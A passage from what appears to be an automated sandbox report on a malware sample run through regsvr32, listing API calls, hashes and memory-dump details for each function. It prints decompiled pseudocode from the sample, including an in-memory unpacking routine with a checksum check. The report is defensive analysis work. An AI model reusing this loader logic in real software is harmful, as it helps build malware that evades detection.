                                                                                                                                                                                                                                      • Part of subcall function 023E550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,023E2274,00000000,00000000), ref: 023E551D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 023E22F1
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E2340
                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(04CC9570), ref: 023E2351
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: memset.NTDLL ref: 023E3DEE
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 023E3E22
                                                                                                                                                                                                                                      • Part of subcall function 023E3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 023E3E2D
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 023E237C
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 023E23AC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4246211962-0
                                                                                                                                                                                                                                    • Opcode ID: 480dbfdb47523c630cf3fa9ae513f23b106420f310a6110c52274d4d4be228a6
                                                                                                                                                                                                                                    • Instruction ID: 5ecf0f55d29b8a20047c6f38b31df3bf010db3cbb12c763d722e8285c2972b88
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 480dbfdb47523c630cf3fa9ae513f23b106420f310a6110c52274d4d4be228a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3051ADB1F50239EBDF309AA59884B6F77ADAB08704F044826E903EB1C1E775D95C8F51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E3AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(80000002), ref: 023E3B46
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(023E1885), ref: 023E3B89
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E3B9D
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E3BAB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: 8d733f03bcf193a35792341abb933707153c256956e674b42e197a3f835ea975
                                                                                                                                                                                                                                    • Instruction ID: f799429fcd1d1fcfb8fd2ba0f3c1c69ca92bde4f6d55ec1b1d54fd473cf3f78e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d733f03bcf193a35792341abb933707153c256956e674b42e197a3f835ea975
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931EAB190010AEF8F15DF98D4D48AE7BB9FF48354B10846EE50BA7290D7359689CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D18F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D18F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x26d4130;
				_t39 = E026D1F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x26d414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x26d51a7; // 0x26d51a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E026D18C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x26d414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}























                                                                                                                                                                                                                                    0x026d18fb
                                                                                                                                                                                                                                    0x026d190b
                                                                                                                                                                                                                                    0x026d1912
                                                                                                                                                                                                                                    0x026d1915
                                                                                                                                                                                                                                    0x026d192a
                                                                                                                                                                                                                                    0x026d1931
                                                                                                                                                                                                                                    0x026d1936
                                                                                                                                                                                                                                    0x026d1947
                                                                                                                                                                                                                                    0x026d194a
                                                                                                                                                                                                                                    0x026d1952
                                                                                                                                                                                                                                    0x026d1955
                                                                                                                                                                                                                                    0x026d19ff
                                                                                                                                                                                                                                    0x026d195b
                                                                                                                                                                                                                                    0x026d195b
                                                                                                                                                                                                                                    0x026d195f
                                                                                                                                                                                                                                    0x026d19c7
                                                                                                                                                                                                                                    0x026d1961
                                                                                                                                                                                                                                    0x026d1961
                                                                                                                                                                                                                                    0x026d1964
                                                                                                                                                                                                                                    0x026d1966
                                                                                                                                                                                                                                    0x026d196e
                                                                                                                                                                                                                                    0x026d1971
                                                                                                                                                                                                                                    0x026d1974
                                                                                                                                                                                                                                    0x026d197c
                                                                                                                                                                                                                                    0x026d1984
                                                                                                                                                                                                                                    0x026d1985
                                                                                                                                                                                                                                    0x026d1986
                                                                                                                                                                                                                                    0x026d198d
                                                                                                                                                                                                                                    0x026d198d
                                                                                                                                                                                                                                    0x026d19a1
                                                                                                                                                                                                                                    0x026d19a6
                                                                                                                                                                                                                                    0x026d19af
                                                                                                                                                                                                                                    0x026d19b6
                                                                                                                                                                                                                                    0x026d19b9
                                                                                                                                                                                                                                    0x026d19bd
                                                                                                                                                                                                                                    0x026d19c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1979
                                                                                                                                                                                                                                    0x026d1979
                                                                                                                                                                                                                                    0x026d19c4
                                                                                                                                                                                                                                    0x026d19d1
                                                                                                                                                                                                                                    0x026d19e6
                                                                                                                                                                                                                                    0x026d19d3
                                                                                                                                                                                                                                    0x026d19dc
                                                                                                                                                                                                                                    0x026d19e1
                                                                                                                                                                                                                                    0x026d19f7
                                                                                                                                                                                                                                    0x026d19f7
                                                                                                                                                                                                                                    0x026d1a06
                                                                                                                                                                                                                                    0x026d1a0c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,026D167D,00003000,00000004,?,?,026D167D,00000000), ref: 026D194A
                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,026D167D,?,?,026D167D,00000000), ref: 026D19DC
                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,026D167D,00000000), ref: 026D19F7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                    • String ID: Mar 9 2021
                                                                                                                                                                                                                                    • API String ID: 4010158826-2159264323
                                                                                                                                                                                                                                    • Opcode ID: 22e3ef7a5a46040d99616e1b16e9676fd38dc2f717e86dba6a8f49c383ffe6a0
                                                                                                                                                                                                                                    • Instruction ID: 5c2a213307180326b59964e517a649393ceb13995095ece011f5c6ef407d2850
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22e3ef7a5a46040d99616e1b16e9676fd38dc2f717e86dba6a8f49c383ffe6a0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE315071E0011DAFCB00CF99C881BAEBBB5BF49304F1481A9E509FB244D7B1AA56CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E1A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                    			E023E1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E023E2049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                                                                                                                    0x023e1a7c
                                                                                                                                                                                                                                    0x023e1a80
                                                                                                                                                                                                                                    0x023e1a81
                                                                                                                                                                                                                                    0x023e1a82
                                                                                                                                                                                                                                    0x023e1a84
                                                                                                                                                                                                                                    0x023e1a86
                                                                                                                                                                                                                                    0x023e1a8b
                                                                                                                                                                                                                                    0x023e1a8e
                                                                                                                                                                                                                                    0x023e1b25
                                                                                                                                                                                                                                    0x023e1b2c
                                                                                                                                                                                                                                    0x023e1b2c
                                                                                                                                                                                                                                    0x023e1a97
                                                                                                                                                                                                                                    0x023e1a9e
                                                                                                                                                                                                                                    0x023e1aae
                                                                                                                                                                                                                                    0x023e1aae
                                                                                                                                                                                                                                    0x023e1ab4
                                                                                                                                                                                                                                    0x023e1ab6
                                                                                                                                                                                                                                    0x023e1abb
                                                                                                                                                                                                                                    0x023e1ac4
                                                                                                                                                                                                                                    0x023e1acc
                                                                                                                                                                                                                                    0x023e1acf
                                                                                                                                                                                                                                    0x023e1ada
                                                                                                                                                                                                                                    0x023e1ade
                                                                                                                                                                                                                                    0x023e1ae0
                                                                                                                                                                                                                                    0x023e1ae1
                                                                                                                                                                                                                                    0x023e1aea
                                                                                                                                                                                                                                    0x023e1aee
                                                                                                                                                                                                                                    0x023e1aff
                                                                                                                                                                                                                                    0x023e1af0
                                                                                                                                                                                                                                    0x023e1af5
                                                                                                                                                                                                                                    0x023e1afa
                                                                                                                                                                                                                                    0x023e1b09
                                                                                                                                                                                                                                    0x023e1b09
                                                                                                                                                                                                                                    0x023e1ade
                                                                                                                                                                                                                                    0x023e1b0f
                                                                                                                                                                                                                                    0x023e1b15
                                                                                                                                                                                                                                    0x023e1b15
                                                                                                                                                                                                                                    0x023e1b1e
                                                                                                                                                                                                                                    0x023e1b23
                                                                                                                                                                                                                                    0x023e1b23
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                                                    • Opcode ID: 145d6d8931a7da475e5188fb993c6a86c1cdb5fd8c25eaa3d0a2b0b0542ba6e2
                                                                                                                                                                                                                                    • Instruction ID: 99182f4c9f2cdef6ac06aa9072ee4512a0d2b58c2db0e994d6032f8e0ba2df98
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 145d6d8931a7da475e5188fb993c6a86c1cdb5fd8c25eaa3d0a2b0b0542ba6e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C213075A00219EFCF10DFA8D884ADEBBB9FF49315B1045A9E94AE7250E730DE48CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E94A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E023E94A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E023E2049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x23ec2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x23ec2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                                                                                                                                                                                                    0x023e94b4
                                                                                                                                                                                                                                    0x023e94b8
                                                                                                                                                                                                                                    0x023e94ba
                                                                                                                                                                                                                                    0x023e94bb
                                                                                                                                                                                                                                    0x023e94c3
                                                                                                                                                                                                                                    0x023e94c3
                                                                                                                                                                                                                                    0x023e94c7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e94be
                                                                                                                                                                                                                                    0x023e94bf
                                                                                                                                                                                                                                    0x023e94c2
                                                                                                                                                                                                                                    0x023e94c2
                                                                                                                                                                                                                                    0x023e94cf
                                                                                                                                                                                                                                    0x023e94d6
                                                                                                                                                                                                                                    0x023e94da
                                                                                                                                                                                                                                    0x023e94e2
                                                                                                                                                                                                                                    0x023e94e8
                                                                                                                                                                                                                                    0x023e94ea
                                                                                                                                                                                                                                    0x023e94ef
                                                                                                                                                                                                                                    0x023e94f3
                                                                                                                                                                                                                                    0x023e94f5
                                                                                                                                                                                                                                    0x023e94f8
                                                                                                                                                                                                                                    0x023e94ff
                                                                                                                                                                                                                                    0x023e94ff
                                                                                                                                                                                                                                    0x023e9509
                                                                                                                                                                                                                                    0x023e950c
                                                                                                                                                                                                                                    0x023e950f
                                                                                                                                                                                                                                    0x023e950f
                                                                                                                                                                                                                                    0x023e951b
                                                                                                                                                                                                                                    0x023e951b
                                                                                                                                                                                                                                    0x023e9528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,04CC95AC,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94C3
                                                                                                                                                                                                                                    • StrTrimA.KERNELBASE(?,023EC2A4,00000002,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94E2
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94ED
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,023EC2A4,?,023E23DE,?,023E7634,04CC95AC,?,023E23DE), ref: 023E94FF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                                                    • Opcode ID: 73d5bf81ce0678383a1516a26b2935e68544e1cbba70eb3009c67ac97a9f56ee
                                                                                                                                                                                                                                    • Instruction ID: 87da2e9f4d89f952ea62b42967ab2bbdeb96ae755f1b43a02217c5ba2bd8f59b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73d5bf81ce0678383a1516a26b2935e68544e1cbba70eb3009c67ac97a9f56ee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B971A453355FDA30DE559C49F2B7B9CEF49A50F111919F842C72C0DB60C80987A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D111A, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E026D163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                                                                                    0x026d1123
                                                                                                                                                                                                                                    0x026d1128
                                                                                                                                                                                                                                    0x026d1136
                                                                                                                                                                                                                                    0x026d113b
                                                                                                                                                                                                                                    0x026d113b
                                                                                                                                                                                                                                    0x026d1141
                                                                                                                                                                                                                                    0x026d1146
                                                                                                                                                                                                                                    0x026d114a
                                                                                                                                                                                                                                    0x026d114e
                                                                                                                                                                                                                                    0x026d114e
                                                                                                                                                                                                                                    0x026d1158
                                                                                                                                                                                                                                    0x026d1161

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 026D111D
                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 026D1128
                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 026D113B
                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 026D114E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                    • Opcode ID: c8164b36dd0251698afa3c8c2eff4244212e6fd7e501e582b6111560ecf08084
                                                                                                                                                                                                                                    • Instruction ID: 41e01d316e982ff3f7bc0f273e3239df24faf71179bfcc4854edb11aceee31c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8164b36dd0251698afa3c8c2eff4244212e6fd7e501e582b6111560ecf08084
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E02231E022182BA3112B284C84F6F775CDFA6330B0102A5F524D23C0CBA48C228AA6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E73FD, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E73FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E023EA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x23ed27c; // 0x28da5a8
				_t4 = _t24 + 0x23eede0; // 0x4cc9388
				_t5 = _t24 + 0x23eed88; // 0x4f0053
				_t26 = E023E1262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x23ed27c; // 0x28da5a8
						_t11 = _t32 + 0x23eedd4; // 0x4cc937c
						_t48 = _t11;
						_t12 = _t32 + 0x23eed88; // 0x4f0053
						_t55 = E023E7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x23ed27c; // 0x28da5a8
							_t13 = _t35 + 0x23eee1e; // 0x30314549
							if(E023E89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x23ed25c - 6;
								if( *0x23ed25c <= 6) {
									_t42 =  *0x23ed27c; // 0x28da5a8
									_t15 = _t42 + 0x23eec2a; // 0x52384549
									E023E89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x23ed27c; // 0x28da5a8
							_t17 = _t38 + 0x23eee18; // 0x4cc93c0
							_t18 = _t38 + 0x23eedf0; // 0x680043
							_t45 = E023E2659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x23ed238, 0, _t55);
						}
					}
					HeapFree( *0x23ed238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E023E1F99(_t54);
				}
				return _t45;
			}

















                                                                                                                                                                                                                                    0x023e73fd
                                                                                                                                                                                                                                    0x023e740d
                                                                                                                                                                                                                                    0x023e7410
                                                                                                                                                                                                                                    0x023e7417
                                                                                                                                                                                                                                    0x023e7419
                                                                                                                                                                                                                                    0x023e7419
                                                                                                                                                                                                                                    0x023e741c
                                                                                                                                                                                                                                    0x023e7421
                                                                                                                                                                                                                                    0x023e7428
                                                                                                                                                                                                                                    0x023e7435
                                                                                                                                                                                                                                    0x023e743a
                                                                                                                                                                                                                                    0x023e743e
                                                                                                                                                                                                                                    0x023e744c
                                                                                                                                                                                                                                    0x023e745a
                                                                                                                                                                                                                                    0x023e745e
                                                                                                                                                                                                                                    0x023e74ef
                                                                                                                                                                                                                                    0x023e74ef
                                                                                                                                                                                                                                    0x023e7464
                                                                                                                                                                                                                                    0x023e7464
                                                                                                                                                                                                                                    0x023e7469
                                                                                                                                                                                                                                    0x023e7469
                                                                                                                                                                                                                                    0x023e7470
                                                                                                                                                                                                                                    0x023e747c
                                                                                                                                                                                                                                    0x023e747e
                                                                                                                                                                                                                                    0x023e7480
                                                                                                                                                                                                                                    0x023e7482
                                                                                                                                                                                                                                    0x023e7489
                                                                                                                                                                                                                                    0x023e749b
                                                                                                                                                                                                                                    0x023e749d
                                                                                                                                                                                                                                    0x023e74a4
                                                                                                                                                                                                                                    0x023e74a6
                                                                                                                                                                                                                                    0x023e74ad
                                                                                                                                                                                                                                    0x023e74b8
                                                                                                                                                                                                                                    0x023e74b8
                                                                                                                                                                                                                                    0x023e74a4
                                                                                                                                                                                                                                    0x023e74bd
                                                                                                                                                                                                                                    0x023e74c2
                                                                                                                                                                                                                                    0x023e74c9
                                                                                                                                                                                                                                    0x023e74e7
                                                                                                                                                                                                                                    0x023e74e9
                                                                                                                                                                                                                                    0x023e74e9
                                                                                                                                                                                                                                    0x023e7480
                                                                                                                                                                                                                                    0x023e74fb
                                                                                                                                                                                                                                    0x023e74fb
                                                                                                                                                                                                                                    0x023e74fd
                                                                                                                                                                                                                                    0x023e7502
                                                                                                                                                                                                                                    0x023e7504
                                                                                                                                                                                                                                    0x023e7504
                                                                                                                                                                                                                                    0x023e750f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04CC9388,00000000,?,76D7F710,00000000,76D7F730), ref: 023E744C
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04CC93C0,?,00000000,30314549,00000014,004F0053,04CC937C), ref: 023E74E9
